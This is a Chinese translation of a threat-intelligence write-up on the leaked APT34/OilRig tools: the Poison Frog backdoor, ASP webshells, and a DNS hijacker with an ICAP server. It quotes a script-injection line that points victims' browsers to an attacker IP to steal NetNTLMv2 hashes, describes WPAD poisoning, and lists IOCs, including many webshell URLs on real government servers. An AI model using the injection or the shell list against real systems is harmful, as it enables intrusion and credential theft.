结果是atag1273EC,最后一部分是随机的,后来附加到myleftheart.com,也是受害者机器上创建的文件夹的名称。

请注意,我上传它们后,今天首次在VirusTotal上看到这些样本,只有2个防病毒AV检测到它们:

不幸的是,服务器部分缺少css文件和其他重要文件,因此无法正确运行它。但打开原始面板文件可以了解它的功能:
PS:md,入口文件都没有。

到下一个……

泄漏的很大一部分有大量的ASP Webshell,被称为HighShellHyperShell,其中包含了相当多的变种。
HyperShell超过30k行代码…
为了查看shell,你需要有一个叫做pcookie和正确的密码。不幸的是,泄漏者剥夺了所有有意义的密码,并用Th!sN0tF0rFAN替换了它们。

正如您在下面的屏幕截图中看到的,将cookie与te字符串pp进行比较,这是base64的结果:base64(sha256(Bytes(cookie+salt)))

在写这篇文章的时候,似乎有2个ASP Shell仍然在线:

  1. hxxps://webmail.sstc.com.sa/owa/auth/logout.aspx
  2. hxxps://mail.adac.ae/owa/auth/RedirOutlookService.aspx/

另一个名为dnspionage。它附带一个WIKI和安装脚本来帮助操作人员。它分为两部分;

icap.py这是一个ICAP服务器,似乎能够接收所有类型的数据,如凭据,cookie …
让我感到好奇的是这一行:

  1. script = ';$(document).ready(function(){$(\'<img src="file://[ip]/resource/logo.jpg"><img src="http://WPAD/avatar.jpg">\');});'

我认为[ip]必须被攻击者IP替代,然后当它作为img注到刀受害者的浏览器时,它将触发Windows跳转到file:// ip并且攻击者将能够窃取NetNTLMv2哈希值

PS:TL; DR是不多BB的意思。
下面说的这个是LLMNR投毒。
TL; DR:每个基于NT的操作系统都附带一个接近理想情况的LLMNR/NBT-NS中毒设置,除非管理员使用步骤1或2配置WPAD。攻击者是能够强制客户端使用NTLM对计算机进行身份验证,并执行MitM攻击。

此外,假设攻击者已获得对代理的控制权,他可以让他的服务器响应DNS对WPAD的请求,然后让他的服务器响应获取具有实际上是PAC文件的图像的请求,达到目的。

有趣的一个点; 这个服务器用一个time值为3000天的标题来响应,这意味着你的浏览器基本上会一直缓存它并且如果你不清理你的缓存,那么他就会在你电脑里呆很多年……

第二部分是dns.py也有它的javascript版本dnsd.js.
这似乎是一个DNS劫持者,这并不奇怪,因为APT34以DNS劫持攻击而闻名。它在UDP端口53上运行,当它收到请求时,它将检查域是否在他的配置文件中,并覆盖响应,无论攻击者设置了什么IP。所以基本上这将使攻击者能够将使用该dns的受害者发送到他自己的恶意服务器。

此泄漏中的其他文件包含了许多来自用户的私钥和凭据,还包含许多域的DA凭据:

还有更有趣的,这个组织找到很多弱口令的忠实粉丝:

请注意,泄漏的文件包含2个名为MinionProjectFoxPanel222的附加文件夹。它们似乎又是客户端/服务器应用程序。它们都包含一个控制面板和二进制文件,但我还没有分析它们。
泄密者还提供了其他面板截图(似乎来自另一个面板):

此次分析比较仓促,你可以关注Florian Roth:https://twitter.com/cyb3rops?

IOC:

© Poison frog Changed by Poison Frogs Team
myleftheart.com
C:\Users\Public\Public\atag[0-9]{4}[A-Z]{2}
C:\Users\Public\Public\dUpdater.ps1
C:\Users\Public\Public\hUpdated.ps1
C:\Users\Public\Public\UpdateTask.vbs
27e03b98ae0f6f2650f378e9292384f1350f95ee4f3ac009e0113a8d9e2e14ed
b1d621091740e62c84fc8c62bcdad07873c8b61b83faba36097ef150fd6ec768
2943e69e6c34232dee3236ced38d41d378784a317eeaf6b90482014210fcd459
07e791d18ea8f2f7ede2962522626b43f28cb242873a7bd55fff4feb91299741
dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229
3ca3a957c526eaeabcf17b0b2cd345c0fffab549adfdf04470b6983b87f7ec62
c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e
a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e
fe1b011fe089969d960d2dce2a61020725a02e15dbc812ee6b6ecc6a98875392

Shells:
hxxps://202.183.235.31/owa/auth/signout.aspx
hxxps://202.183.235.4/owa/auth/signout.aspx
hxxps://122.146.71.136/owa/auth/error3.aspx
hxxps://59.124.43.229/owa/auth/error0.aspx
hxxps://202.134.62.169/owa/auth/signin.aspx
hxxps://202.164.27.206/owa/auth/signout.aspx
hxxps://213.14.218.51/owa/auth/logon.aspx
hxxps://88.255.182.69/owa/auth/getidtoken.aspx
hxxps://95.0.139.4/owa/auth/logon.aspx
hxxps://1.202.179.13/owa/auth/error1.aspx
hxxps://1.202.179.14/owa/auth/error1.aspx
hxxps://114.255.190.1/owa/auth/error1.aspx
hxxps://180.166.27.217/owa/auth/error3.aspx
hxxps://180.169.13.230/owa/auth/error1.aspx
hxxps://210.22.172.26/owa/auth/error1.aspx
hxxps://221.5.148.230/owa/auth/outlook.aspx
hxxps://222.178.70.8/owa/auth/outlook.aspx
hxxps://222.66.8.76/owa/auth/error1.aspx
hxxps://58.210.216.113/owa/auth/error1.aspx
hxxps://60.247.31.237/owa/auth/error3.aspx
hxxps://60.247.31.237/owa/auth/logoff.aspx
hxxps://202.104.127.218/owa/auth/error1.aspx
hxxps://202.104.127.218/owa/auth/exppw.aspx
hxxps://132.68.32.165/owa/auth/logout.aspx
hxxps://132.68.32.165/owa/auth/signout.aspx
hxxps://209.88.89.35/owa/auth/logout.aspx
hxxps://114.198.235.22/owa/auth/login.aspx
hxxps://114.198.237.3/owa/auth/login.aspx
hxxps://185.10.115.199/owa/auth/logout.aspx
hxxps://195.88.204.17/owa/auth/logout.aspx
hxxps://46.235.95.125/owa/auth/signin.aspx
hxxps://51.211.184.170/owa/auth/owaauth.aspx
hxxps://91.195.89.155/owa/auth/signin.aspx
hxxps://82.178.124.59/owa/auth/gettokenid.aspx
hxxps://83.244.91.132/owa/auth/logon.aspx
hxxps://195.12.113.50/owa/auth/error3.aspx
hxxps://78.100.87.199/owa/auth/logon.aspx
hxxps://110.74.202.90/owa/auth/errorff.aspx
hxxps://211.238.138.68/owa/auth/error1.aspx
hxxps://168.63.221.220/owa/auth/error3.aspx
hxZps://213.189.82.221/owa/auth/errorff.aspx
hxxps://205.177.180.161/owa/auth/erroref.aspx
hxxps://77.42.251.125/owa/auth/logout.aspx
hxxps://202.175.114.11/owa/auth/error1.aspx
hxxps://202.175.31.141/owa/auth/error3.aspx
hxxps://213.131.83.73/owa/auth/error4.aspx
hxxps://187.174.201.179/owa/auth/error1.aspx
hxxps://200.33.162.13/owa/auth/error3.aspx
hxxps://202.70.34.68/owa/auth/error0.aspx
hxxps://202.70.34.68/owa/auth/error1.aspx
hxxps://197.253.14.10/owa/auth/logout.aspx
hxxps://41.203.90.221/owa/auth/logout.aspx
hxxp://www.abudhabiairport.ae/english/resources.aspx
hxxps://mailkw.agility.com/owa/auth/RedirSuiteService.aspx
hxxp://www.ajfd.gov.ae/_layouts/workpage.aspx
hxxps://mail.alfuttaim.ae/owa/auth/change_password.aspx
hxxps://mail.alraidah.com.sa/owa/auth/GetLoginToken.aspx
hxxp://www.alraidah.com.sa/_layouts/WrkSetlan.aspx
hxxps://webmail.alsalam.aero/owa/auth/EventClass.aspx
hxxps://webmail.bix.bh/owa/auth/Timeoutctl.aspx
hxxps://webmail.bix.bh/owa/auth/EventClass.aspx
hxxps://webmail.bix.bh/ecp/auth/EventClass.aspx
hxxps://webmail.citc.gov.sa/owa/auth/timeout.aspx
hxxps://mail.cma.org.sa/owa/auth/signin.aspx
hxxps://mail.dallah-hospital.com/owa/auth/getidtokens.aspx
hxxps://webmail.dha.gov.ae/owa/auth/outlookservice.aspx
hxxps://webmail.dnrd.ae/owa/auth/getidtoken.aspx
hxxp://dnrd.ae:8080/_layouts/WrkStatLog.aspx
hxxps://www.dns.jo/statistic.aspx
hxxps://webmail.dsc.gov.ae/owa/auth/outlooklogonservice.aspx
hxxps://e-albania.al/dptaktkonstatim.aspx
hxxps://owa.e-albania.al/owa/auth/outlookdn.aspx
hxxps://webmail.eminsco.com/owa/auth/outlookfilles.aspx
hxxps://webmail.eminsco.com/owa/auth/OutlookCName.aspx
hxxps://webmail.emiratesid.ae/owa/auth/RedirSuiteService.aspx
hxxps://mailarchive.emiratesid.ae/EnterpriseVault/js/jquery.aspx
hxxps://webmail.emiratesid.ae/owa/auth/handlerservice.aspx
hxxp://staging.forus.jo/_layouts/explainedit.aspx
hxxps://government.ae/tax.aspx
hxxps://formerst.gulfair.com/GFSTMSSSPR/webform.aspx
hxxps://webmail.ictfund.gov.ae/owa/auth/owaauth.aspx
hxxps://jaf.mil.jo/ShowContents.aspx
hxxp://www.marubi.gov.al/aspx/viewpercthesaurus.aspx
hxxps://mail.mindware.ae/owa/auth/outlooktoken.aspx
hxxps://mail.mis.com.sa/owa/auth/Redirect.aspx
hxxps://webmail.moe.gov.sa/owa/auth/redireservice.aspx
hxxps://webmail.moe.gov.sa/owa/auth/redirectcache.aspx
hxxps://gis.moei.gov.ae/petrol.aspx
hxxps://gis.moenr.gov.ae/petrol.aspx
hxxps://m.murasalaty.moenr.gov.ae/signproces.aspx
hxxps://mail.mofa.gov.iq/owa/auth/RedirSuiteService.aspx
hxxp://ictinfo.moict.gov.jo/DI7Web/libraries/aspx/RegStructures.aspx
hxxp://www.mpwh.gov.jo/_layouts/CreateAdAccounts.aspx
hxxps://mail.mygov.ae/owa/auth/owalogin.aspx
hxxps://ksa.olayan.net/owa/auth/signin.aspx
hxxps://mail.omantourism.gov.om/owa/auth/GetTokenId.aspx
hxxps://email.omnix-group.com/owa/auth/signon.aspx
hxxps://mail.orange-jtg.jo/OWA/auth/signin.aspx
hxxp://fwx1.petra.gov.jo/SEDCOWebServer/global.aspx
hxxp://fwx1.petranews.gov.jo/SEDCOWebServer/content/rtl/QualityControl.aspx
hxxps://webmail.presflt.ae/owa/auth/logontimeout.aspx
hxxps://webmail.qchem.com/OWA/auth/RedirectCache.aspx
hxxps://meet.saudiairlines.com/ClientResourceHandler.aspx
hxxps://mail.soc.mil.ae/owa/auth/expirepw.aspx
hxxps://email.ssc.gov.jo/owa/auth/signin.aspx
hxxps://mail.sts.com.jo/owa/auth/signout.aspx
hxxp://www.sts.com.jo/_layouts/15/moveresults.aspx
hxxps://mail.tameen.ae/owa/auth/outlooklogon.aspx
hxxps://webmail.tra.gov.ae/owa/auth/outlookdn.aspx
hxxp://bulksms.umniah.com/gmgweb/MSGTypesValid.aspx
hxxps://evserver.umniah.com/index.aspx
hxxps://email.umniah.com/owa/auth/redirSuite.aspx
hxxps://webmail.gov.jo/owa/auth/getidtokens.aspx
hxxps://www.tra.gov.ae/signin.aspx
hxxps://www.zakatfund.gov.ae/zfp/web/tofollowup.aspx
hxxps://mail.zayed.org.ae/owa/auth/espw.aspx
hxxps://mail.primus.com.jo/owa/auth/getidtoken.aspx

原文链接:https://misterch0c.blogspot.com/2019/04/apt34-oilrig-leak.html?m=1&from=timeline&isappinstalled=0


文章来源: http://mp.weixin.qq.com/s?__biz=MzUyMDgzMDMyMg==&mid=2247483718&idx=1&sn=19d076344422a685343e91cecb18db0d&chksm=f9e52d5bce92a44d1dd1de0e8a57496ea1807f49d037e16b9aa7e770a71f0ca3403d6c568bc7&mpshare=1&scene=24&srcid=#rd
如有侵权请联系:admin#unsafe.sh